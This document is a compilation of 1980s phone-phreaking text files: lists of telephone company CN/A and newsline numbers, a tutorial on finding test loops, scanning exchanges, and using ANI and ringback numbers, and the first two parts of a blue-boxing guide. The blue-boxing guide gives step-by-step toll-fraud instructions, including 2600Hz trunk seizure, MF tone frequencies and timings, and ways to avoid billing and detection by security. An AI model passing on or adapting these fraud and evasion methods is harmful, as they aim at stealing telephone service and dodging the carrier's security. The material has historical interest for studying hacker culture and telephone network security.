804-747-1411306 ****N/A***** 704 912-784-9111307 303-232-2300 705 416-487-3641308 402-345-0600 707 415-546-1341309 217-525-7000 709 ****N/A*****312 312-769-9600 712 402-345-0600313 313-223-8690 713 713-658-1793314 314-436-3321 714 213-995-0221315 518-471-8111 715 414-424-5690316 816-275-2782 716 518-471-8111317 317-265-7027 717 412-633-5600318 318-227-1551 801 303-232-2300319 402-345-0600 802 617-787-2750401 617-787-2750 803 912-784-9111402 402-345-0600 804 804-747-1411403 403-425-2652 805 415-546-1341404 912-784-9111 806 512-828-2502405 405-236-6121 807 416-487-3641406 303-232-2300 808 212-226-5487408 415-546-1341 BERMUDA ONLY412 412-633-5600 809 212-334-4336413 617-787-2750 812 317-265-7027414 414-424-5690 813 813-228-7871415 415-546-1132 814 412-633-5600416 416-487-3641 815 217-525-7000417 314-436-3321 816 816-275-2782418 514-861-6391 817 214-948-5731419 614-464-2345 819 514-861-6391501 405-236-6121 901 615-373-5791502 502-583-2861 902 902-421-4110503 503-241-3440 903 ****N/A*****504 504-245-5330 904 912-784-9111505 303-232-2300 906 313-223-8690506 506-657-3855 907 ****N/A*****507 402-345-0600 912 912-784-9111509 206-382-8000 913 816-275-2782512 512-828-2501 914 518-471-8111513 614-464-2345 915 512-828-2501514 514-861-6391 916 415-546-1341515 402-345-0600 918 405-236-6121516 518-471-8111 919 912-784-9111 BELL USES THESE #'S MAINLY TO FIND OUT WHO OWNS A # THAT A CUSTOMER CLAIMS HE NEVER CALLED.NOTE: THIS IS THE MOST COMPLETE LIST OF CN/A #'S IN MY POSSESSION (WITH ONLY 5 #'S NOT AVAILABLE) THIS LIST WAS COPYRIGHTED IN 1982 BY "JUDAS GERARD" AS IT ORIGINALLY APPEARED IN TAP ISSUE #78. (TAP, ROOM 603, 147 W 42ND ST, NEW YORK, NY 10036-- SUBSCRIPTIONS $10/YR.)AT&T NEWSLINES:---------------NEWSLINES ARE RECORDINGS THAT BELL EMPLOYEES CALL UP TO FIND OUT THE LATEST INFO ON STOCK, TECHNOLOGY, ETC.CONCERNING THE BELL SYSTEM.HERE ARE THE #'S THAT ARE CURRENTLY KNOWN TO PHREAKS (AT LEAST TO ME ANYWAY): NJ201-483-3800 NJ 513-421-9060 OH203-771-4920 CT 516-234-9914 NY212-393-2151 NY 518-471-2272 NY213-621-4141 CA 617-955-1111 MA213-829-0111 CA (GTE) 702-789-6711 NV213-449-8830 CA 713-224-6116 TX312-368-8000 IL 714-238-1111 CA313-223-7223 MI 717-255-5555 PA314-247-5511 MO 717-787-1031 PA408-493-5000 CA 802-955-1111 VE412-633-3333 PA 808-533-4426 HI414-678-3511 WI 813-223-5666 FL416-929-4323 ONT. 914-948-8100 NY503-228-6271 OR 916-480-8000 ========LOOPS======== FIRST OF ALL, YOU MUST UNDERSTAND THE CONCEPT OF LOOPS. I THINK THAT THE BEST WAY THAT THIS IS UNDERSTOOD IS THE WAY THAT PHRED PHREEK EXPLAINED IT..."NO SELF-RESPECTING PHONE PHREAK CAN GO THROUGH LIFE WITHOUT KNOWING WHAT ALOOP IS, HOW TO USE ONE, AND THE TYPES THAT ARE AVAILABLE. THE LOOP IS AGREAT ALTERNATIVE COMMUNICATION MEDIUM THAT HAS MANY POTENTIAL USES THAT HAVENT'T EVEN BEEN TAPPED YET. IN ORDER TO EXPLAIN WHAT A LOOP IS, ITWOULD BE HELPFUL TO VISUALIZE TWO PHONE NUMBERS (LINES) JUST FLOATING AROUND INTHE TELCO CENTRAL OFFICE (CO). NOW, IF YOU (AND A FRIEND PERHAPS) WERE TO CALL THESE TWO NUMBERS AT THE SAME TIME,POOOOPFFF!!!, YOU ARE NOW CONNECTED TOGETHER. I HEAR WHAT YOU'RE SAYING OUT THERE..., "BIG DEAL" OR "WHY SHOULD MA BELL COLLECT HERE TWO MSU'S (MESSAGE UNITS) FOR ONE LOUSY PHONE CALL!?" WELL... THINK AGAIN. HAVEN'T YOU EVER WANTED SOMEONE TO CALL YOU BACK BUT, WERE RELUCTANT TO GIVE OUT YOUR HOME PHONE NUMBER (LIKE THE LAST TIME YOU TRIED TO GET YOUR FRIEND'S UNLISTED #FROM THE BUSINESS OFFFICE)? OR HOW ABOUT A COLLECT CALL TO YOUR FRIEND WAITING ON A LOOP, WHO WILL GLADLY ACCEPT THE CHARGES? OR BETTER YET,STUMBLING UPON A LOOP THAT YOU DISCOVER THAT HAS MULTI-USER CAPABILITY (FORTHOSE LATE-NIGHT CONFERENCES). BEST OF ALL IS FINDING A NON-SUPERVISED LOOP THAT DOESN'T CHARGE ANY MSU'S OR TOLLS TO ONE OR BOTH PARTIES. EXAMPLE: MANY MOONS AGO, A LOOP AFFECTIONATELY KNOWN AS 'THE 332 LOOP' WAS NON-SUP (IE, NON-SUPERVISED) ON THE TONE SIDE. I HAD MY FRIEND IN CALIFORNIA DIAL THE FREE(NON-SUP) SIDE, (212) 332-9906 AND I DIALED THE SIDE THAT CHARGED, 332-9900.AS YOU CAN SEE, I WAS CHARGED ONE MSU,AND MY FRIEND WAS CHARGED ZILCH, FOR ASLONG AS WE WISHED TO TALK!!!" .AHHH...HAVE I PERKED YOUR INTEREST YET?IF SO, HERE IS HOW TO FIND A LOOP OFYOU VERY OWN. FIRST, DO ALL OF YOU LOOP SEARCHING AT NIGHT! THIS IS BECAUSE THE LOOPS SERVE A GENUINE TEST FUNCTION WHICH TELCO USES DURING THE DAY. (WE DON'T WANT TO RUN INTO ANI RATE LINEMAN NOW, DO WE?) TO FINDA LOOP, HAVING 2 #'S IS A DEFINITE PLUS. IF NOT, HAVE A FRIEND TO DIAL#'S AT HIS LOCATION. LAST RESORT, TRY DIALING FROM TWO ADJACENT PAY PHONES.NOW GET YOUR TRUSTY WHITE PAGES (*),AND TURN TO THE PAGE WHERE IT LISTS THE # OF MSU'S FROM YOUR EXCHANGE (OR EXCHANGES IN YOUR PRIMARY CALLING AREA)THE IDEA IS TO FIND A LOOP THAT I SWITHIN YOUR PRIMARY CALLING AREA OR IS ONLY 1 MSU IN YOUR AREA (CALL AREA A).THIS IS SO YOU DON'T GO BANKRUPT TRYING TO FIND A LOOP. WRITE DOWN ALL OF THESE EXCHANGES AND DO A 99XX SCAN OF THOSE EXCHANGES (99XX SCANNING WILL BE DISCUSSED SHORTLY).BEFORE WE GET UP TO 99XX SCANNING, WE WILL LOOK AT SOME OTHER LOOP INFO:LOOPS ARE FOUND PAIRS WHICH ARE USUALLY CLOSE TO EACH OTHER. FOR EXAMPLE, IN NPA 212, WHERE THE INFAMOUS LOOPS ARE FOUND, THERE IS A STANDARD LOOP FORMAT:MANHATTAN & BRONX-------NNX-9977/9979 BROOKLYN &QUEENS-------NNX-9900/9906NNX IS THE EXCHANGE TO BE SCANNED. HERE ARE SOME LOOPS THAT HAVE BEEN FOUND IN NYC. THESE ARE USED MOSTLY BY PHREAKS AND CALL-IN LINES FOR PIRATE RADIOSTATIONS: 212-220-9900/9906212-283-9977/9979212-352-9900/9906212-365-9977/ 9979212-529-99009906212-562-9977/9979212-982-9977/9979212-986-9977/9979 THE LOWER # IS THE TONE SIDE (SINGING SWITCH). THE HIGHER # IS ALWAYS SILENT. THE TONE DISAPPEARS ON THE LOWER # WHEN SOMEBODY DIALS IN THE OTHER SIDE OF THE LOOP. IF YOU ARE ONTHE HIGHER #, YOU'LL HAVE TO LISTEN TO THE CLICKS TO SEE IF SOMEBODY DIALED-IN. THE NYC 982 & 986 LOOPS ARE DIFFERENT FROM OTHERS. USUALLY WHEN YOU PARK ON A LOOP, YOU WILL HEAR WHO EVER CALLS IN ON THE OTHER HALF. WHEN THEY'RE DONE, THE NEXT CALLER (IF ANY) WILL BE QUEUED IN, ONE AFTER ANOTHER.ON THE NYC 982 & 986, YOU SOMETIME SCAN'T GET ANY MORE CALLERS IN AFTER THE FIRST. FURTHERMORE, IF YOU PARK ONE OF THESE LOOPS AND THERE IS NOBODY ON THE OTHER END FOR MORE THAN 4 MINUTES, YOU MAY BE AUTOMATICALLY DISCONNECTED.THESE LOOPS ARE GOOD FOR BACK-UPPURPOSES WHEN ALL OTHER LOOPS ARE BUSY. 99XX SCANNING:--------------MOST EVERY EXCHANGE IN THE BELL SYSTEM HAS A WIDE VARIETY OF TEST #'S AND OTHER "GOODIES," SUCH AS LOOPS.THESE "GOODIES" ARE USUALLY FOUND BETWEEN 9900 AND 9999 IN YOUR LOCAL EXCHANGE. IF YOU HAVE THE TIME ANDINITIATIVE, SCAN YOUR EXCHANGE AND YOUMAY BECOME LUCKY!HERE ARE MY FINDINGS IN THE 914-268:9901 - VERIFICATION (RECORDING OF A/C AND EXCHANGE)9936 - VOICE # TO THE TELCO CO9937 - VOICE # TO THE TELCO CO9941 - CARRIER9960 - OSC. TONE (TONE SIDE LOOP)9963 - TONE (STOPS: MUTED)9966 - CARRIER9968 - TONE THAT DISAPPEARS--RESPONDS TO CERTAIN TOUCH-TONE KEYSMOST OF THE #'S BETWEEN 9900 & 9999WILL RING, BE BUSY, GO TO A SPECIAL INTERCEPT OPERATOR ("WHAT #, PLEASE?"), OR WILL GO TO A "THE # YOU HAVE REACHED..." RECORDING. WHAT YOU FIND DEPENDS UPON THE SWITCHING EQUIPMENT IN THE EXCHANGE AND THE TELCO OPERATING COMPANY.WHEN SEARCHING FOR LOOPS, YOU MAY FIND ONE OF THE FOLLOWING POSSIBILITIES WHEN YOU FIND ONE:1. YOU CAN HEAR THROUGH THE LOOP (NOT MUTED), BUT THERE IS A 1/2 SECOND CLICK EVERY 10 SECONDS THAT INTERRUPTS THE AUDIO.THIS TYPE IS GOOD FOR BACK-UP USE BUT THE %$#'&" CLICK IS SUPER ANNOYING.2.ONE SIDE OF THE LOOP IS BUSY; TRY IT AGAIN LATER.3. THE TONE DISAPPEARS, BUT YOU CANNOT HEAR THROUGH IT (THE LOOP IS MUTED, TRY AGAIN IN A MONTH OR SO)4.YOU GET "THE # YOU HAVE REACHED RECORDING." NO LOOP THERE! MOST LOOPS ARE MUTED (#3), BUT THEIR STATUS DOES CHANGES FROM TIME-TO-TIME.IT ALL DEPENDS IF THE TELCO MAINTENANCE PERSONNEL REMEMBER TO "THROW THE SWITCH", IE, TURN OFF THE LOOP. SINCE I HAVE DONE THE ABOVE 914-26899XX SCAN, CONGERS (268) HAS INSTALLED NEW SWITCHING EQUIPMENT (DMS100). SOME OF THE NUMBERS ARE THE SAME, BUT I HAVE NOTICED THAT ON THE DMS100, THE RECORDINGS ARE ALSO STORED IN THISAREA. 268-9903, 9906, 9909, & 9912 ARE ALL DIFFERENT RECORDINGS. ALSO, THERE ARE 2 FORTRESS FONE RECORDINGS AT 268-9911 (DEPOSIT 5 CENTS OR ELSE) AND 268-9913 (DEPOSIT 10 CENTS). NONE OF THESE RECORDINGS SUPE AND ALOT OF OTHER 99XX#'S DON'T SUPE EITHER.IN SOME AREAS (LIKE MD), 9906-7 IS RINGBACK. IN WASHINGTON, THERE IS A SWEEP TONE TEST AT (202) 560-9944. IN NYC (212), YOU'LL FIND THE INFAMOUS LOOP LINES (AS MENTIONED ABOVE).IT WILL BE EASIER TO SCAN YOUR EXCHANGE IF YOU MAKE UP A CHART LIKE THE ONE BELOW: NPA-NNX-99XX SCAN !--------------------------------------!99X X>:0 :1 :2 :3 :4 :5 :6 :7 :8 :9 !--------------------------------------!990 : : : : : : : : : : !--------------------------------------!991 : : : : : : : : : : !--------------------------------------!992 : : : : : : : : : : !--------------------------------------!993 : : : : : : : : : : !--------------------------------------!994 : : : : : : : : : : !--------------------------------------!995 : : : : : : : : : : !--------------------------------------!996 : : : : : : : : : : !--------------------------------------!997 : : : : : : : : : : !--------------------------------------!998 : : : : : : : : : : !--------------------------------------!999 : : : : : : : : : : !------------------------------------------------------------------------- THIS LEAVES YOU WITH 100 BOXES (1 FOREACH # BETWEEN 9900 & 9999). YOU SHOULD MAKE YOUR BOXES BIG ENOUGH SO YOU CAN WRITE SOME SORT OF SHORT HAND IN THEM. FOR EXAMPLE: B - BUSY (TRY AGAIN AT ANOTHER TIME) R - RINGS (TRY AGAIN AT ANOTHER TIME) O - INTERCEPT OPERATOR ("WHAT # YOU CALLING?) R1- RECORDING 1 (MAKE A MARGIN NOTE OF THE TYPES OF RE ORDINGS YOU GET) T - TONE TONE AT A LOWER # + IGNOREI - IGNORE AT A HIGHER # = LOOPV - VOICE # TO TELCO CO - THEY USUALLY ANSWER WITH THE CITY NAME OR AREA. C - CARRIER THERE WILL BE OTHERS AND YOU SHOULD USE OTHER CHARACTERS THAT YOU CAN UNDERSTAND.NOW, BACK TO LOOPS! AS YOU MAY HAVE NOTICED IN MY 914-268 SCAN, I FOUND AMUTED LOOP AND A TONE SIDE. 914-268 FAILED TO COME UP WITH THE SILENT SIDE OF A LOOP! THEREFORE, THERE IS NO LOOPIN THAT EXCHANGE. I THEN SCANNED ANOTHER EXCHANGE IN MY PRIMARY CALLING AREA (914-634) AND I FOUND A LOOP!!(914) 634-9923/9924SO, IF AT FIRST YOU DON'T SUCCEED, MOVE ONTO ANOTHER EXCHANGE.IF YOU USE THE BOX METHOD THAT I HAVE OUTLINED ABOVE, YOU WILL SEE A T & INEXT TO EACH OTHER FOR A LOOP.SOME EXCHANGES ARE SPECIAL. FOREXAMPLE, 914-623 IS A TESTING BUREAU.IN THIS EXCHANGE, NOT ONLY DID I FIND ALOOP, BUT I ALSO FOUND SEVERAL INTERESTING TONES, NOISES, AND OTHERTEST FUNCTIONS. ALSO, THE MORE IMPORTANT THE EXCHANGE IS, THE MORE YOU WILL FIND. FOR EXAMPLE, IN 914-623, I FOUND WELL OVER 10 VOICE #'S! ALSO, LOOPS ARE USUALLY, BUT NOT EXCLUSIVELY, FOUND IN THE 99XX SERIES.FOR EXAMPLE:(713) 324-1799/1499IS A LOOP.THE PERFECT LOOP? HERE IS WHAT I WOULD LOOK FOR: 1.NON-SUP ON ONE OR BOTH SIDES. TO CHECK FOR A NON-SUP LOOP, GO TO A TONE-FIRST FORTRESS FONE AND DIAL THE #.IF IT ASKS FOR A DIME, IT IS SUPERVISED. IF THE CALL GOES THROUGH, THEN IT IS NON-SUPED! 2. 800 LOOPS WOULD BE A PLUS. THEY ARE NOT NECESSARILY FOUND BETWEEN 9900 & 9999 THOUGH. I WOULD CHECK THE 1XXX SERIES FIRST. 3. MULTI-USER LOOPS ARE ALSO A PLUS FOR THOSE LATE NIGHT CONFERENCES.FINALLY, REMEMBER IT IS ONLY A LOCAL CALL TO FIND OUT WHAT YOU CO HAS IN STORE FOR YOU. IF YOU FIND ANYTHING INTERESTING, BE SURE TO DROP ME A LINE.NOTE: YOUR LOCAL WHITE PAGES CAN BE A VALUABLE ASSET. YOU CAN ALSO ORDER OTHER FONE BOOKS FROM YOUR BUSINESS OFFICE (USUALLY FREE FOR BOOKS WITHIN YOUR OPERATING COMPANY'S DISTRICT). A LARGE FONE BOOK, SUCH AS MANHATTAN, CONTAINS MUCH MORE INFO IN THE FIRST FEW PAGES THAN OTHER BOOKS. ======ANI====== AUTOMATIC NUMBER IDENTIFICATION (ANI),IS A NUMBER THAT YOU CALL UP THAT WILL TELL YOU WHAT # YOU ARE CALLING FROM.THIS HAS A FEW USES. FIRST, WERE YOU EVER SOMEWHERE AND THE FONE DIDN'T HAVEA # PRINTED ON IT? OR PERHAPS YOU WERE FOOLING AROUND IN SOME CANS (THOSE LARGE BOXES ON FONE POLES THAT CONTAIN TERMINALS FOR LINEMAN USE--TO BE DISCUSSES IN A FUTURE CHAPTER.) AND YOU WANT TO KNOW WHAT WHAT THE LINE # IS.IN NPA 914, THE ANI IS 990. IN NPA'S212 & 516, ANI IS 958. THIS VARIES FROM AREA TO AREA.HERE ARE SOME OTHER ANI'S THAT I HAVESEEN:890-751-519120222222221-XXX-1111 (IN SOME 914 AREAS, ESP. UNDER STEP-BY-STEP SWITCHING EQUIPMENT, YOU HAVE TO DIAL 1-990-1111)TO FIND ANI FOR OTHER AREAS, CHECK 3 DIGITS #'S FIRST, USUALLY IN THE 9XXSERIES (EXCLUDING 911). IN AREAS UNDERSTEP-BY-STEP (TO BE DISCUSSED IN THE NEXT PART) TRY 1-9XX-1111.ANI MAY ALSO BE IN 99XX. LAST RESORT,TRY TO GET FRIENDLY WITH YOUR NEIGHBOR WHO WORKS FOR THE FONE COMPANY.RINGBACK:---------RINGBACK, AS ITS NAME IMPLIES, CALLSBACK THE # YOU ARE AT WHEN YOU DIAL THE RINGBACK #.RINGBACK, IN NPA 914, IS 660. YOU DIAL660+THE LAST 4 DIGITS OF THE FONE. YOU WILL THEN GET A TONE, HANG-UP QUICKLY AND PICK-UP IN ABOUT 2 SECONDS. YOU WILL THEN GET A SECOND TONE, HANG-UP AGAIN AND THE FONE WILL RING.IN NYC, IT IS ALSO 660, BUT YOU MAY HAVE TO PRESS 6 OR 7 BEFORE YOU HANG UPFOR THE FIRST TIME (IE, AT THE FIRST TONE).OTHER RINGBACK #'S THAT I HAVE SEEN ARE:26011 - THIS 5 DIGIT FORMAT IS USED PRIMARILY ON STEP-BY-STEP. THE LAST 2 DIGITS (11) ARE DUMMY DIGITS.890-897-XXXX - XXXX ARE THE LAST 4 DIGITS OF THE FONE #.119911/11911/1199911 - GTENNX-9906/9907 - NPA 301, NNX IS THE EXCHANGE THE REASON YOU GET THE TONE WHEN YOU PICK-UP AFTER IT RINGS IS BECAUSE IN SOME AREAS, PEOPLE WERE USING RINGBACKAS AN IN-HOUSE INTERCOM. THEY WOULD DIAL RINGBACK, AND WHEN IT STOPPED RINGING, THEY WOULD PICK-UP & TALK WITHTHE PERSON WHO PICKED UP THE OTHER EXTENSION. BELL DIDN'T LIKE THIS SINCE THERE IS USUALLY ONLY 1 PIECE OF EQUIPMENT IN EACH EXCHANGE THAT DOES THE RINGBACK. WHEN PEOPLE USED THIS ASAN INTERCOM, LINEMEN & REPAIRMEN COULDN'T GET THROUGH! IN SOME AREAS,ESPECIALLY THOSE UNDER STEP-BY-STEP, RINGBACK CAN STILL BE USED AS AN INTERCOM. ALSO, UNDER STEP-BY-STEP,THE RINGBACK PROCEDURE IT USUALLY SIMPLE. FOR EXAMPLE, IN ONE AREA YOU WOULD DIAL 26011 AND HANG-UP; IT WOULD THEN RINGBACK.TOUCH-TONE TEST:---------------- IN AREAS THAT HAVE A TOUCH-TONE TEST,YOU DIAL THE RINGBACK #. AT THE FIRST TONE, YOU TOUCH-TONE DIGITS 1-0. IF THEY ARE CORRECT IT WILL BEEP TWICE.I HAVE ALSO SEEN A TT TEST IN SOMEAREAS AT: 890-751-5191COMING SOON:------------ IN THE NEXT PART, WE WILL LOOK ATVARIOUS SWITCHING EQUIPMENT AND THE NETWORK. BREAK UP OF BELL:-----------------THE OPERATING COMPANIES ARE NOT GOING TO CHANGE ALL THE SWITCHING EQUIPMENT AROUND. WHILE THERE WILL BE SOME CHANGES, MOST OF THE INFORMATION PROVIDED HERE WILL REMAIN PERTINENT AFTER JANUARY 1, 1984. JUST SUBSTITUTE THE WORD "FONE NETWORK" FOR BELL SYSTEM.AU REVOIR, *****BIOC*=$=*AGENT***** DECEMBER 8, 1983 ACKNOWLEDGEMENTS: TAP, PHRED PHREEK,JUDAS GERARD, THE MAGICIAN, DARKPRIEST, & MYSELF. I WOULD ALSO LIKE TO THANK THE MULCHER FOR HIS ASSISTANCE IN DISTRIBUTING THIS TUTORIAL. The Next text file was one of my favorite in my B-Boxing days. As I know of, the information in this text is still very good information, because AT&T still has not switch out all of there older equipment. It is still even possible to box off of 1-800 wats lines! Even though, I myself wouldn't. Read and learn why. I have found that some 305 area codes still work well though....... V - -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Better Homes and Blue Boxing Part I Theory of Operation =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- To quote Karl Marx, blue boxing has always been the most noble form of phreaking. As opposed to such things as using an MCI code to make a free fone call, which is merely mindless pseudo-phreaking, blue boxing is actual interaction with the Bell System toll network. It is likewise advisable to be more cautious when blue boxing, but the careful phreak will not be caught, regardless of what type of switching system he is under. In this part, I will explain how and why blue boxing works, as well as where. In later parts, I will give more practical information for blue boxing and routing information. To begin with, blue boxing is simply communicating with trunks. Trunks must not be confused with subscriber lines (or "customer loops") which are standard telefone lines. Trunks are those lines that connect central offices. Now, when trunks are not in use (i.e., idle or "on-hook" state) they have 2600Hz applied to them. If they are two-way trunks, there is 2600Hz in both directions. When a trunk IS in use (busy or "off-hook" state"), the 2600Hz is removed from the side that is off-hook. The 2600Hz is therefore known as a supervisory signal, because it indicates the status of a trunk; on hook (tone) or off-hook (no tone). Note also that 2600Hz denoted SF (single frequency) signalling and is "in-band." This is very important. "In-band" means that is is within the band of frequencies that may be transmitted over normal telefone lines. Other SF signals, such as 3700Hz are used also. However, they cannot be carried over the telefone network normally (they are "out-of- band") and are therefore not able to be taken advantage of as 2600Hz is. Back to trunks. Let's take a hypothetical phone call. You pick up your fone and dial 1+806-258-1234 (your good friend in Armarillo, Texas). For ease, we'll assume that you are on #5 Crossbar switching and not in the 806 area. Your central office (CO) would recognize that 806 is a foreign NPA, so it would route the call to the toll centre that serves you. [For the sake of accuracy here, and for the more experienced readers, note that the CO in question is a class 5 with LAMA that uses out-of-band SF supervisory signalling]. Depending on where you are in the country, the call would leave your toll centre (on more trunks) to another toll centre, or office of higher "rank". Then it would be routed to central office 806-258 eventually and the call would be completed. Illustration: A---CO1-------TC1------TC2----CO2----B A=you CO1=your central office TC1=your toll office. TC2=toll office in Amarillo. CO2=806-258 central office. B=your friend (806-258-1234) In this situation it would be realistic to say that CO2 uses SF in-band (2600Hz) signalling, while all the others use out-of-band signalling (3700Hz). If you don't understand this, don't worry too much. I am pointing this out merely for the sake of accuracy. The point is that while you are connected to 806-258- 1234, all those trunks from YOUR central office (CO1) to the 806-258 central office (CO2) do *NOT* have 2600Hz on them, indicating to the Bell equipment that a call is in progress and the trunks are in use. Now let's say you're tired of talking to your friend in Amarillo (806-258-1234) so you send a 2600Hz down the line. This tone travels down the line to your friend's central office (CO2) where it is detected. However, that CO thinks that the 2600Hz is originating from Bell equipment, indicating to it that you've hung up, and thus the trunks are once again idle (with 2600Hz present on them). But actually, you have not hung up, you have fooled the equipment at your friend's CO into thinking you have. Thus,it disconnects hi and resets the equipment to prepare for the next call. All this happens very quickly (300-800ms for step-by-step equipment and 150-400ms for other equipment). When you stop sending 2600Hz (after about a second), the equipment thinks that another call is coming towards it (e.g. it thinks the far end has come "off-hook" since the tone has stopped. It could be thought of as a toggle switch: tone --> on hook, no tone -->off hook. Now that you've stopped sending 2600Hz, several things happen: 1) A trunk is seized. 2) A "wink" is sent to the CALLING end from the CALLED end indicating that the CALLED end (trunk) is not ready to receive digits yet. 3) A register is found and attached to the CALLED end of the trunk within about two seconds (max). 4) A start-dial signal is sent to the CALLING end from the CALLED end indicating that the CALLED end is ready to receive digits. Now, all of this is pretty much transparent to the blue boxer. All he really hears when these four things happen is a . So, seizure of a trunk would go something like this: 1> Send a 2600Hz 2> Terminate 2600Hz after 1-2 secs. 3> [beep][kerchunk] Once this happens, you are connected to a tandem that is ready to obey your every command. The next step is to send signalling information in order to place your call. For this you must simulate the signalling used by operators and automatic toll-dialing equipment for use on trunks. There are mainly two systems, DP and MF. However, DP went out with the dinosaur , so I'll only discuss MF signalling. MF (multi-frequency) signalling is the signalling used by the majority of the inter- and intra-lata network. It is also used in international dialing known as the CCITT no.5 system. MF signalling consists of 7 frequencies, beginning with 700Hz and separated by 200Hz. A different set of two of the 7 frequencies represent the digits 0 thru 9, plus an additional 5 special keys. The frequencies and uses are as follows: Frequencies (Hz) Do stic Int'l -------------------------------------- 700+900 1 1 700+1100 2 2 900+1100 3 3 700+1300 4 4 900+1300 5 5 1100+1300 6 6 700+1500 7 7 900+1500 8 8 1100+1500 9 9 1300+1500 0 0 700+1700 ST3p Code 11 900+1700 STp Code 12 1100+1700 KP KP1 1300+1700 ST2p KP2 1500+1700 ST ST The timing of all the MF signals is a nominal 60ms, except for KP, which should have a duration of 100ms. There should also be a 60ms silent period between digits. This is very flexible, however, and most Bell equipment will accept outrageous timings. In addition to the standard uses listed above, MF pulsing also has expanded usages known as "expanded inband signalling" that include such things as coin collect, coin return, ringback, operator attached, and operator released. KP2, code 11, and code 12 and the STops (STart "primes") all have special uses which will be mentioned only briefly here. To complete a call using a blue box, once seizure of a trunk has been accomplished by sending 2600Hz and pausing for the , one must first send a KP. This readies the register for the digits that follow. For a standard domestic call, the KP would be followed by either 7 digits (if the call were in the same NPA as the seized trunk) or 10 digits (if the call were not in the same NPA as the seized trunk). [Exactly like dialing a normal fone call]. Following either the KP and 7 or 10 digits, a STart is sent to signify that no more digits follow. Example of a complete call: 1> Dial 1-806-258-1234 2> wait for a call-progress indication (such as ring, busy, recording, etc.) 3> Send 2600Hz for about 1 second. 4> Wait for about 2 seconds while a trunk is seized. 5) Send KP+305+994+9966+ST The call will then connect if everything was done properly. Note that if a call to an 806 number were being placed in the same situation, the area code would be omitted and only KP+ seven digits+ST would be sent. Code 11 and code 12 are used in international calling to request certain types of operators. KP2 is used in international calling to route a call other than by way of the normal route, whether for economic or equipment reasons. STp, ST2p, and ST3p (prime, two prime, and three prime) are used in TSPS signalling to indicate calling type of call (such as coin-direct dialed). This has been Part I of Better Homes and Blue Boxing. I hope you enjoyed and learned from it. If you have any questions, comments, threats or insults, please fell free to drop me a line. If you have noticed any errors in this text (yes, it does happen), please let me know and perhaps a correction will be in order. Part II will deal mainly with more advanced principles of blue boxing, as well as routings and operators. Note 1: other highly trunkable areas include: 816,305,813,609,205. I personally have excellent luck boxing off of 609-953-0000. Try that if you have any trouble. =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Better Homes and Blue Boxing Part II Practical Applications =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= The essential purpose of blue boxing in the beginning was merely to receive toll services free of charge. Though this can still be done, blue boxing has essentially outlived its usefulness in this area. Modern day "extenders" and long distance services provide a safer and easier way to make free fone calls. However, you can do things with a blue box that just can't be done with any- thing else. For ordinary toll-fraud, a blue box is impractical for the following reasons: 1. Clumsy equipment required (blue box or equivalent) 2. Most boxed calls must be made through an extender. Not for safety reasons, but for reasons I'll explain later. 3. Connections are often sacrificed because considerable distances must be dialed to cross a seizable trunk, in addition to awkward routing. As stated in reason #2, boxed calls are usually made through an extender. This is for billing reasons. If you recall from Part i, 2600Hz is used as a "supervisory" signal. That is, it signals the status of a trunk-- "on-hook" or "off-hook." When you seize a trunk (by briefly sending 2600Hz), your end (the CALLING end) goes on hook for the duration of the 2600Hz and then goes off-hook once again when the 2600Hz is terminated. The CALLED end recognizes that a call is on the way and attaches a register, which inerprets the digits which are to be sent. Now, understand that even though your end has come off-hook (no 2600Hz present), the other end is still on-hook. You may wonder then, why, if the other end (the CALLED end) is still on-hook, there is no 2600Hz coming the other way on the trunk, when there should be. This is correct. 2600Hz *IS* present on the trunk when you seize it and afterwards, but you cannot hear it because of a Band Elimination Filter (BEF) at your central office. Back to the problem. Remember that when you seize a trunk, 2600Hz is indeed coming the other way on the trunk because the CALLED end is still on-hook, but you don't actually hear it because of a filter. However, the Bell equipment knows it's there (they can "hear" it). The presence of the 2600Hz is telling the billing equip- ment that your call has not yet been completed (i.e., the CALLED end is still on-hook). When finally you do connect with your boxed call, the 2600Hz from the called end terminates. This tells the billing equipment that someone picked up the fone at the CALLED end and you should begin to be billed. So you do start to get billed, but for the call to the trunk, NOT the boxed call. Your billing equipment thinks that you've connected with the number you used to seize the trunk. Illustration: 1. You call 1+806-258-2222 (directly) 2. Status of trunks: <-----------------------------------> (You) 806-258-2222 No 2600Hz-------> <------------2600Hz When you seize a trunk (before the number you called answers) there is no affect on your billing equipment. It simply thinks that you're still waiting for the call to complete (the CALLED end is still on-hook; it is ringing, busy, going to recorder or intercept operator. Now, let's say that you've sezied a trunk (806-258-2222) and for example, KP+314+949+1705+ST. The call is routed from the tandem you seized to: 314-949-1705. Illustration: <------------------>O<---------------> (You) 806 314-949 tandem No 2600Hz----------> <----------2600Hz Note that the entire path towards the right (the CALLED end) has no 2600Hz present and is therefore "off- hook." The entire path towards the left (the CALLING end) does have 2600Hz present on it, indicating that the CALLED end has not picked up (or come "off-hook"). When 314-949-1705 answers, "answer supervision" is given and the 2600Hz towards the left (the CALLING end) terminates. This tells your billing equipment, which thinks that you're still waiting to be connected with 806-258-2222, that you've finally connected. Billing then begins to 806-258-2222. Not exactly an auspicious beginning for an aspiring young phone phreak. To avoid this, several actions may be taken. As previously mentioned, one may avoid being charged for the number called to seize a trunk by using an extender (in which case the extender will get billed). In some areas, boxing may be accomplished using an 800 number, generally in the format of 800-858-xxxx (many Amarillo numbers) or 800-NN2-xxxx (special intra-state class in-WATS numbers). However, boxing off of 800 numbers is impossible in many areas. In my area, Denver, I am served by #1A ESS and it is impossible for me to box off of any 800 number. Years ago, in the early days of blue boxing (before my time), phreaks often used directory assistance to box off of because they were "free" long distance calls. However, because of competetive long distance companies, directory assistance surcharges are now $0.50 in many areas. It is additionally advised that directory assistance numbers not be used to box from because of the following: Average DA calls last under 2 minutes. When you box a call, chances are that it will last considerably longer. Thus, the Bell billing equip- ment will make a note of calls to directory assistance that last a long time. A call to a directory assistant lasting for 4 hours and 17 minutes may appear somewhat suspicious. Although the date, time, and length of a DA call do not appear on the bill, it is recorded on AMA tape and will trip a trouble report if it were to last too long. This is how most phreaks were discovered in the old days. Also, sometimes too many calls lasting too long to one 800 number may raise a few eyebrows at the local security office. Assuming you can complete a blue box call, the following are listed routings for various Bell internal operators. These are in the format of KP+NPA+ special routing+1X1+ST, which I will explain later. The 1X1 is the actual operator routing, and NPA and NPA+ special routing are used for out-of- area code calls and out-of-area code calls requiring special routing, respectively. 